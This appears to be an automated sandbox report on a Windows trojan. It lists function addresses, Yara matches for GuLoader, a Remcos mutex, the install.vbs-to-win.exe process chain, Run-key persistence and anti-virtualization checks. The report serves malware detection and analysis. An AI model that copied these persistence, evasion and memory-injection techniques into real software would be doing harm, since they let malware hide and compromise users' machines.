            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8D7E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4570
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A5D71
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A116C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A095B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8D5C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A9951
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4948
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8547
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A093E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2D30
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4D2A
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1120
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4520
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A5D21
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3114
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8D14
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A45F9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8DFF
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A09FD
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A31F4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A49F4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4DE9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0DEF
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A45E0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A45E4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8DC3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A45B5
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A41A7
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0D91
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2D88
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4D83
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4985
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A7E78
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4A73
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3275
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1265
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A6253
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8E4B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0E4D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3244
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4638
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3E30
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4E36
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0A37
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4A27
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1204
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A12DC
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A46D3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8ED0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1ED7
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0EB3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4AA0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A62A4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4E99
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4694
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0A88
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8E8C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0E80
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4A87
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1F7F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A136B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3B6F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A6363
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3B60
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4B5C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1F52
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2F50
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2F3E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1F3C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2B37
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0F2F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4B2D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4B25
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1313
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4F14
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A630B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4300
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4B00
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2B01
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A47F4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0FEB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2BD8
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8BBE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3BAF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A63AC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0F9B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4797
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4F8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B623F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0816
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CBA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1D2E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1204
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A27
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4638
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3E30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0A37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E36
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8E4B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E4D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B6253
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1265
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7E78
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A73
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0A88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8E8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A87
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E99
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4694
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4AA0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B62A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0EB3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B12DC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B46D3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8ED0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1ED7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B630B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B01
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4300
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B00
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1313
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0F2F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B2D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F3E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1F3C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B37
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1F52
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B136B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B6F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B6363
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3B60
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1F7F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F8C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0F9B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4797
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3BAF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B63AC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8BBE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2BD8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0FEB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B47F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3C0C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B641B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C16
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0C25
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3C3F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2C33
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B104C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4847
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0C5B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C68
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B247D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B6480
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4899
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2C94
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1094
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CA6
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B10CB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B44CF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CC1
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B44C0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B64DB
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: win.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384937023.00000000029A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCamases3.exeFE2Xj vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384197435.00000000020A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466440658.000000001E030000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462556682.000000000085C000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462556682.000000000085C000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466753489.000000001E130000.00000002.00000001.sdmp Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466753489.000000001E130000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000000.383148228.000000000041B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462715117.0000000002400000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Binary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engine Classification label: mal96.troj.evad.winEXE@19/10@9/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe File created: C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-E2OTZW
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe File created: C:\Users\user\AppData\Local\Temp\~DF1570032FE38D6039.TMP
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\win.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Roaming\win.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
            Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: unknown Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exe Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exe Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Process created: C:\Windows\System32\backgroundTaskHost.exe 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match, File source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.603499845.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000018.00000000.596745893.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000016.00000000.566291257.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000017.00000000.566645906.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_0040828A push esp; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_00405F01 pushfd ; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_00406914 push eax; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_004077CE push ss; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020BA211 push es; retf
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8516 push es; retf
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 22_2_00566CD5 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 22_2_00566DA2 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 22_2_00565B95 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 24_2_00566CD5 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 24_2_00566DA2 push es; iretd
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 24_2_00565B95 push es; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe File created: C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Contains functionality to detect hardware virtualization (CPUID execution measurement)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3244
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3275
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B2F50
